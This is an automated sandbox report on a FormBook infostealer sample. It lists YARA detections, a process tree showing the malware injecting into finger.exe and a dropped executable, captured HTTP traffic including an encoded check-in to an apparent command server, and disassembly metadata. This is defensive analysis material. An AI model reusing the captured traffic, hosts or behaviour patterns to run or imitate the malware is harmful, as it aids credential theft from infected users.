                                                            Referer: http://www.e8af.xyz/hhdc/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                            Data Raw: 72 46 62 64 79 3d 72 6e 48 53 50 55 6f 6e 79 30 37 59 75 39 44 4c 79 6b 73 6d 6f 30 6b 61 50 67 34 50 76 4d 6e 42 63 56 50 59 2f 63 53 46 4a 69 53 4f 6a 45 78 76 45 59 2b 4a 4f 68 79 58 71 45 6e 33 68 52 51 52 61 62 45 4f 76 6a 48 73 4f 30 67 7a 2b 47 59 70 4e 39 48 37 59 68 36 53 4e 50 44 77 59 61 72 31 4f 61 69 66 5a 5a 63 53 47 38 4d 67 6d 54 49 2f 74 56 41 50 2b 43 4b 61 56 4f 77 38 55 65 67 4c 6b 71 74 2b 78 6b 72 6a 2b 46 6d 63 2b 4a 35 55 56 53 31 65 69 64 39 37 66 32 37 58 44 31 30 4c 7a 59 62 33 63 4a 69 53 2f 48 59 39 41 4e 76 48 70 41 66 51 46 70 66 68 52 44 52 76 66 4f 2f 42 6b 65 6b 72 53 61 33 67 6b 5a 34 46 36 32 36 32 65 51 3d 3d
                                                            Data Ascii: rFbdy=rnHSPUony07Yu9DLyksmo0kaPg4PvMnBcVPY/cSFJiSOjExvEY+JOhyXqEn3hRQRabEOvjHsO0gz+GYpN9H7Yh6SNPDwYar1OaifZZcSG8MgmTI/tVAP+CKaVOw8UegLkqt+xkrj+Fmc+J5UVS1eid97f27XD10LzYb3cJiS/HY9ANvHpAfQFpfhRDRvfO/BkekrSa3gkZ4F6262eQ==
                                                            Jan 11, 2025 05:45:29.508373022 CET1236INHTTP/1.1 404 Not Found
                                                            Server: nginx/1.18.0 (Ubuntu)
                                                            Date: Sat, 11 Jan 2025 04:45:29 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            X-Trace: 2B0E8ABB617BD9862FFF8B999087830FF1EE3C5463E5355DA0E5584D0700
                                                            Set-Cookie: _csrf=ef877f69cc5ba2c61962b228895ee8b00dade9de4a0aab81822e4f67c9f925aea%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%224ke5O3JzvbJhBZdkbBxELmWJGKDfoojW%22%3B%7D; path=/; HttpOnly
                                                            Data Raw: 33 31 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 73 72 66 2d 70 61 72 61 6d 22 20 63 6f 6e 74 65 6e 74 3d 22 5f 63 73 72 66 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 73 72 66 2d 74 6f 6b 65 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 2d 43 71 61 77 4a 55 57 62 78 2d 32 71 71 58 55 2d 73 52 6d 70 55 52 44 59 36 6a 45 75 37 5a 37 35 73 70 31 6e 59 66 55 65 72 7a 4d 51 66 5f 31 32 69 55 6c 5a 63 44 49 37 37 79 34 6e 67 4c 4f 4a 67 45 62 37 59 6a 57 34 54 47 68 67 54 48 37 36 4c 73 51 36 77 3d 3d 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f [TRUNCATED]
                                                            Data Ascii: 31b<!DOCTYPE html><html lang="en-US"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="csrf-param" content="_csrf"> <meta name="csrf-token" content="-CqawJUWbx-2qqXU-sRmpURDY6jEu7Z75sp1nYfUerzMQf_12iUlZcDI77y4ngLOJgEb7YjW4TGhgTH76LsQ6w=="> <title>Not Found (#404)</title> <link href="/css/site.css" rel="stylesheet"></head><body><div class="wrap"> <div class="site-error"> <h1>Not Found (#404)</h1> <div class="alert alert-danger"> Page not found. </div> <p> The above error occurred while the Web server was processing your request. </p> <p> Please contact us if you think this is a server error. Thank you. </p></div></di
                                                            Jan 11, 2025 05:45:29.508429050 CET27INData Raw: 76 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: v></body></html>0


                                                            Statistics

                                                            CPU Usage

                                                            Click to jump to process

                                                            Memory Usage

                                                            Click to jump to process

                                                            High Level Behavior Distribution

                                                            Click to dive into process behavior distribution

                                                            Behavior

                                                            Click to jump to process

                                                            System Behavior

                                                            General

                                                            Target ID:5
                                                            Start time:23:42:20
                                                            Start date:10/01/2025
                                                            Path:C:\Users\user\Desktop\wSoShbuXnJ.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\wSoShbuXnJ.exe"
                                                            Imagebase:0x240000
                                                            File size:834'560 bytes
                                                            MD5 hash:FEEA3EB7D321AC0FF06D81683AC140ED
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:low
                                                            Has exited:true

                                                            General

                                                            Target ID:8
                                                            Start time:23:42:35
                                                            Start date:10/01/2025
                                                            Path:C:\Users\user\Desktop\wSoShbuXnJ.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\wSoShbuXnJ.exe"
                                                            Imagebase:0x8b0000
                                                            File size:834'560 bytes
                                                            MD5 hash:FEEA3EB7D321AC0FF06D81683AC140ED
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.1788457173.0000000001380000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.1786669881.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.1795225948.0000000002DF0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                            Reputation:low
                                                            Has exited:true

                                                            General

                                                            Target ID:10
                                                            Start time:23:43:04
                                                            Start date:10/01/2025
                                                            Path:C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exe"
                                                            Imagebase:0xd00000
                                                            File size:140'800 bytes
                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.3140429074.0000000004590000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                            Reputation:high
                                                            Has exited:false

                                                            General

                                                            Target ID:11
                                                            Start time:23:43:05
                                                            Start date:10/01/2025
                                                            Path:C:\Windows\SysWOW64\finger.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\SysWOW64\finger.exe"
                                                            Imagebase:0x800000
                                                            File size:13'824 bytes
                                                            MD5 hash:C586D06BF5D5B3E6E9E3289F6AA8225E
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.3137743344.0000000002930000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.3140545475.00000000030D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.3140592825.0000000003120000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            Reputation:moderate
                                                            Has exited:false

                                                            General

                                                            Target ID:12
                                                            Start time:23:43:18
                                                            Start date:10/01/2025
                                                            Path:C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exe"
                                                            Imagebase:0xd00000
                                                            File size:140'800 bytes
                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.3140404421.0000000002E40000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                            Reputation:high
                                                            Has exited:false

                                                            General

                                                            Target ID:16
                                                            Start time:23:43:30
                                                            Start date:10/01/2025
                                                            Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                            Imagebase:0x7ff613480000
                                                            File size:676'768 bytes
                                                            MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Disassembly

                                                            Reset < >

                                                              Execution Graph

                                                              Execution Coverage:9.4%
                                                              Dynamic/Decrypted Code Coverage:81.4%
                                                              Signature Coverage:0%
                                                              Total number of Nodes:43
                                                              Total number of Limit Nodes:3
                                                              execution_graph 27267 2484668 27268 248467a 27267->27268 27269 2484686 27268->27269 27271 2484778 27268->27271 27272 248479d 27271->27272 27276 2484878 27272->27276 27280 2484888 27272->27280 27278 2484888 27276->27278 27277 248498c 27277->27277 27278->27277 27284 248449c 27278->27284 27281 24848af 27280->27281 27282 248449c CreateActCtxA 27281->27282 27283 248498c 27281->27283 27282->27283 27285 2485918 CreateActCtxA 27284->27285 27287 24859db 27285->27287 27288 248d478 27289 248d4be 27288->27289 27293 248d658 27289->27293 27296 248d647 27289->27296 27290 248d5ab 27300 248cd80 27293->27300 27297 248d658 27296->27297 27298 248cd80 DuplicateHandle 27297->27298 27299 248d686 27298->27299 27299->27290 27301 248d6c0 DuplicateHandle 27300->27301 27302 248d686 27301->27302 27302->27290 27303 248b0f8 27304 248b107 27303->27304 27306 248b1e0 27303->27306 27307 248b224 27306->27307 27309 248b201 27306->27309 27307->27304 27308 248b428 GetModuleHandleW 27310 248b455 27308->27310 27309->27307 27309->27308 27310->27304 27311 67c03c8 27315 67c03f8 27311->27315 27319 67c0400 27311->27319 27312 67c03e5 27316 67c044e DrawTextExW 27315->27316 27318 67c04a6 27316->27318 27318->27312 27320 67c044e DrawTextExW 27319->27320 27322 67c04a6 27320->27322 27322->27312 27323 67c2600 CloseHandle 27324 67c266f 27323->27324

                                                              Executed Functions

                                                              Function 067CDA08 Relevance: 1.8, Strings: 1, Instructions: 547COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.1429437188.00000000067C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067C0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_67c0000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: "
                                                              • API String ID: 0-123907689
                                                              • Opcode ID: 8079d1a1611188200371c40b57c04b3c856087251d9e0586ceca36a807555538
                                                              • Instruction ID: d30c22618ba470a86d45285d6977ad09cd05d246411739bb7c5d8dc12e7d3e14
                                                              • Opcode Fuzzy Hash: 8079d1a1611188200371c40b57c04b3c856087251d9e0586ceca36a807555538
                                                              • Instruction Fuzzy Hash: 63229E70E14214CFDBA4CFA8D444ABEB7F2FF88310F14856EE456AB296D7749881CB91
                                                              Function 02483E1C Relevance: .3, Instructions: 301COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.1426469367.0000000002480000.00000040.00000800.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2480000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6d13c016d9697e44a2e315d0d5abb021fb9e86572f9ed39b2e475642d3f606f9
                                                              • Instruction ID: fbeadf5c53e8000fe9a980a98432d618f63ff3655e77fb21d64f0e2044588894
                                                              • Opcode Fuzzy Hash: 6d13c016d9697e44a2e315d0d5abb021fb9e86572f9ed39b2e475642d3f606f9
                                                              • Instruction Fuzzy Hash: 41D1A274A002099FDB44DFA9C590A9EFBF2FF88304F2582A5D408AB355DB71AD91CF94
                                                              Function 02486F92 Relevance: .2, Instructions: 184COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.1426469367.0000000002480000.00000040.00000800.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2480000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 482666cbd39f0a9410f6995553deb1e9a38543f1cb5888813697d982452bd507
                                                              • Instruction ID: 2b4463a1264474eee11294dff57fc86ab385e211c289503bece4a05e5559a44f
                                                              • Opcode Fuzzy Hash: 482666cbd39f0a9410f6995553deb1e9a38543f1cb5888813697d982452bd507
                                                              • Instruction Fuzzy Hash: DF819175E012488FDB04DFA9C594AEEBBF2BF88300F24816AD409AB365DB759D45CF50
                                                              Function 0248B1E0 Relevance: 1.7, APIs: 1, Instructions: 206COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 234 248b1e0-248b1ff 235 248b22b-248b22f 234->235 236 248b201-248b20e call 2489bf8 234->236 238 248b231-248b23b 235->238 239 248b243-248b284 235->239 243 248b210 236->243 244 248b224 236->244 238->239 245 248b291-248b29f 239->245 246 248b286-248b28e 239->246 290 248b216 call 248b478 243->290 291 248b216 call 248b488 243->291 244->235 247 248b2a1-248b2a6 245->247 248 248b2c3-248b2c5 245->248 246->245 250 248b2a8-248b2af call 248abf4 247->250 251 248b2b1 247->251 253 248b2c8-248b2cf 248->253 249 248b21c-248b21e 249->244 252 248b360-248b420 249->252 255 248b2b3-248b2c1 250->255 251->255 285 248b428-248b453 GetModuleHandleW 252->285 286 248b422-248b425 252->286 256 248b2dc-248b2e3 253->256 257 248b2d1-248b2d9 253->257 255->253 258 248b2f0-248b2f9 call 248ac04 256->258 259 248b2e5-248b2ed 256->259 257->256 265 248b2fb-248b303 258->265 266 248b306-248b30b 258->266 259->258 265->266 267 248b329-248b336 266->267 268 248b30d-248b314 266->268 274 248b338-248b356 267->274 275 248b359-248b35f 267->275 268->267 270 248b316-248b326 call 248ac14 call 248ac24 268->270 270->267 274->275 287 248b45c-248b470 285->287 288 248b455-248b45b 285->288 286->285 288->287 290->249 291->249
                                                              APIs
                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 0248B446
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.1426469367.0000000002480000.00000040.00000800.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2480000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID: HandleModule
                                                              • String ID:
                                                              • API String ID: 4139908857-0
                                                              • Opcode ID: b742cbbe08f0668dff04facae47467706abfa8839d8c15a6b1556ccaefe8646d
                                                              • Instruction ID: 63e602296814f96a0fd5a2973c61c8ee90dba1a94dbd2e807ea428e6331cd280
                                                              • Opcode Fuzzy Hash: b742cbbe08f0668dff04facae47467706abfa8839d8c15a6b1556ccaefe8646d
                                                              • Instruction Fuzzy Hash: 9C811270A10B058FEB24EF6AD45475ABBF1FF88208F108A2ED44ADBB50D775E845CB91
                                                              Function 0248590C Relevance: 1.6, APIs: 1, Instructions: 100COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 292 248590c-2485916 293 2485918-24859d9 CreateActCtxA 292->293 295 24859db-24859e1 293->295 296 24859e2-2485a3c 293->296 295->296 303 2485a4b-2485a4f 296->303 304 2485a3e-2485a41 296->304 305 2485a60 303->305 306 2485a51-2485a5d 303->306 304->303 308 2485a61 305->308 306->305 308->308
                                                              APIs
                                                              • CreateActCtxA.KERNEL32(?), ref: 024859C9
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.1426469367.0000000002480000.00000040.00000800.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2480000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID: Create
                                                              • String ID:
                                                              • API String ID: 2289755597-0
                                                              • Opcode ID: 1d05d6d613c9505868ae7b32883bafde43e4facd86fe406933396c985f1296a2
                                                              • Instruction ID: e883282f1b3abd938d154564d0c1d8dc84a043f0f0a9adf5f9abf7aa0cc3ebab
                                                              • Opcode Fuzzy Hash: 1d05d6d613c9505868ae7b32883bafde43e4facd86fe406933396c985f1296a2
                                                              • Instruction Fuzzy Hash: 8741D2B1C01719CBEB24DFA9C884BCEBBF5BF48304F60806AD419AB251D775694ACF90
                                                              Function 0248449C Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 309 248449c-24859d9 CreateActCtxA 312 24859db-24859e1 309->312 313 24859e2-2485a3c 309->313 312->313 320 2485a4b-2485a4f 313->320 321 2485a3e-2485a41 313->321 322 2485a60 320->322 323 2485a51-2485a5d 320->323 321->320 325 2485a61 322->325 323->322 325->325
                                                              APIs
                                                              • CreateActCtxA.KERNEL32(?), ref: 024859C9
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.1426469367.0000000002480000.00000040.00000800.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2480000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID: Create
                                                              • String ID:
                                                              • API String ID: 2289755597-0
                                                              • Opcode ID: 61a0d9870470896934905272837f34067cf22c15bbd113f854fe99c47515c470
                                                              • Instruction ID: 7bf5044d64bf27ef3ea9d00a7d4d780b70e71cb9b3545ac260f48f6f94b6c65d
                                                              • Opcode Fuzzy Hash: 61a0d9870470896934905272837f34067cf22c15bbd113f854fe99c47515c470
                                                              • Instruction Fuzzy Hash: D141D2B1C1071DCBEB24DFA9C884BDEBBB5BF48304F60805AD408AB251D775694ACF90
                                                              Function 067C03F8 Relevance: 1.6, APIs: 1, Instructions: 70COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 326 67c03f8-67c044c 327 67c044e-67c0454 326->327 328 67c0457-67c0466 326->328 327->328 329 67c0468 328->329 330 67c046b-67c04a4 DrawTextExW 328->330 329->330 331 67c04ad-67c04ca 330->331 332 67c04a6-67c04ac 330->332 332->331
                                                              APIs
                                                              • DrawTextExW.USER32(?,?,?,?,?,?), ref: 067C0497
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.1429437188.00000000067C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067C0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_67c0000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID: DrawText
                                                              • String ID:
                                                              • API String ID: 2175133113-0
                                                              • Opcode ID: b7a075d071b787e9cf3a3b626f4b71a362adc183586ceb65e32ad2500ed5817f
                                                              • Instruction ID: a57d8b189c8168f78cabbb65a8c820bb6689f038df470598fe3bbbfbe457d3a1
                                                              • Opcode Fuzzy Hash: b7a075d071b787e9cf3a3b626f4b71a362adc183586ceb65e32ad2500ed5817f
                                                              • Instruction Fuzzy Hash: 2A31C6B5D01349DFDB10CF9AD884A9EBBF5FB58320F14842EE819A7210D3759545CFA0
                                                              Function 067C0400 Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 335 67c0400-67c044c 336 67c044e-67c0454 335->336 337 67c0457-67c0466 335->337 336->337 338 67c0468 337->338 339 67c046b-67c04a4 DrawTextExW 337->339 338->339 340 67c04ad-67c04ca 339->340 341 67c04a6-67c04ac 339->341 341->340
                                                              APIs
                                                              • DrawTextExW.USER32(?,?,?,?,?,?), ref: 067C0497
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.1429437188.00000000067C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067C0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_67c0000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID: DrawText
                                                              • String ID:
                                                              • API String ID: 2175133113-0
                                                              • Opcode ID: c5688ea9ba272d493b9f959f5c736ea6b427371375a2f9d59516448ffc5e79f3
                                                              • Instruction ID: 9c6bb7a56efecd7f4d07252eda3d193338546efae90e64f1038666e285f1d2a1
                                                              • Opcode Fuzzy Hash: c5688ea9ba272d493b9f959f5c736ea6b427371375a2f9d59516448ffc5e79f3
                                                              • Instruction Fuzzy Hash: EE21C2B5D002099FDB10CF9AD884AAEBBF4EB58320F14842EE919A7210D375A945CFA0
                                                              Function 0248CD80 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 344 248cd80-248d754 DuplicateHandle 346 248d75d-248d77a 344->346 347 248d756-248d75c 344->347 347->346
                                                              APIs
                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0248D686,?,?,?,?,?), ref: 0248D747
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.1426469367.0000000002480000.00000040.00000800.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2480000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID: DuplicateHandle
                                                              • String ID:
                                                              • API String ID: 3793708945-0
                                                              • Opcode ID: e2c4a59f123676b9ce178b71a1fe8acbab5cde539e6a4151e4124a48c2605df3
                                                              • Instruction ID: a6c55576fd2ed949c08aa582d1969cdd8c5147f99dc1fe1b43b8099428cdbfc7
                                                              • Opcode Fuzzy Hash: e2c4a59f123676b9ce178b71a1fe8acbab5cde539e6a4151e4124a48c2605df3
                                                              • Instruction Fuzzy Hash: 1021E3B5D11208DFDB10CFAAD584ADEBBF4EB48314F14806AE918B3351D378A954CFA5
                                                              Function 0248D6B9 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 350 248d6b9-248d6be 351 248d6c0-248d754 DuplicateHandle 350->351 352 248d75d-248d77a 351->352 353 248d756-248d75c 351->353 353->352
                                                              APIs
                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0248D686,?,?,?,?,?), ref: 0248D747
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.1426469367.0000000002480000.00000040.00000800.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2480000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID: DuplicateHandle
                                                              • String ID:
                                                              • API String ID: 3793708945-0
                                                              • Opcode ID: a3da8c51f4c941ab96345d4e8f033bb2b6976645144d9473fa7abf4f497f4774
                                                              • Instruction ID: ad216cd7370574da9664218bafd40f37407af274ce90f8f080bb608ecc5316ce
                                                              • Opcode Fuzzy Hash: a3da8c51f4c941ab96345d4e8f033bb2b6976645144d9473fa7abf4f497f4774
                                                              • Instruction Fuzzy Hash: 9E21D2B5D012089FDB10CFAAD584ADEBBF4EB48314F14801AE914A3351D378A944CFA5
                                                              Function 0248B3E0 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 356 248b3e0-248b420 357 248b428-248b453 GetModuleHandleW 356->357 358 248b422-248b425 356->358 359 248b45c-248b470 357->359 360 248b455-248b45b 357->360 358->357 360->359
                                                              APIs
                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 0248B446
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.1426469367.0000000002480000.00000040.00000800.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2480000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID: HandleModule
                                                              • String ID:
                                                              • API String ID: 4139908857-0
                                                              • Opcode ID: 91e195457ebde4b1ef4c6385c408c45cb35bb9968321d4ecf6ffedb5106a9594
                                                              • Instruction ID: 4a26b035fac3a213564d2574c77c36a2a0a00a77b23edb26845985a7aa876d67
                                                              • Opcode Fuzzy Hash: 91e195457ebde4b1ef4c6385c408c45cb35bb9968321d4ecf6ffedb5106a9594
                                                              • Instruction Fuzzy Hash: B8110FB6C002498FDB20DF9AC444A9EFBF4EB88218F10842AD829B7201C379A545CFA1
                                                              Function 067C1B07 Relevance: 1.3, APIs: 1, Instructions: 58COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 362 67c1b07-67c266d CloseHandle 364 67c266f-67c2675 362->364 365 67c2676-67c269e 362->365 364->365
                                                              APIs
                                                              • CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,067C24B9,?,?), ref: 067C2660
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.1429437188.00000000067C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067C0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_67c0000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID: CloseHandle
                                                              • String ID:
                                                              • API String ID: 2962429428-0
                                                              • Opcode ID: 43d0c610b646485bc2de5012a977c8049449e04a8c13017bc6ff65e06465f85e
                                                              • Instruction ID: 2b586487469080c0cfa9184b8677928776c7e1430117b90479e387367e2129b6
                                                              • Opcode Fuzzy Hash: 43d0c610b646485bc2de5012a977c8049449e04a8c13017bc6ff65e06465f85e
                                                              • Instruction Fuzzy Hash: B41189B5C04308CFCB10DF99C484BDEBBF4EB58320F148019D868A3242D734A644CBA4
                                                              Function 067C1B14 Relevance: 1.3, APIs: 1, Instructions: 50COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 368 67c1b14-67c266d CloseHandle 370 67c266f-67c2675 368->370 371 67c2676-67c269e 368->371 370->371
                                                              APIs
                                                              • CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,067C24B9,?,?), ref: 067C2660
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.1429437188.00000000067C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067C0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_67c0000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID: CloseHandle
                                                              • String ID:
                                                              • API String ID: 2962429428-0
                                                              • Opcode ID: 74c96d9e248b3bcc3b387380f862ddc504391d4553ec52c3c387fffde4914a49
                                                              • Instruction ID: 5719436b1f5095552e087f0aff8ef7fa861803e673615ff1556ebc50a20316f4
                                                              • Opcode Fuzzy Hash: 74c96d9e248b3bcc3b387380f862ddc504391d4553ec52c3c387fffde4914a49
                                                              • Instruction Fuzzy Hash: 5F1134B1800608CFDB20DF9AC444B9EBBF4EB48320F108419D968A7641D338AA44CBA5
                                                              Function 067C2600 Relevance: 1.3, APIs: 1, Instructions: 48COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
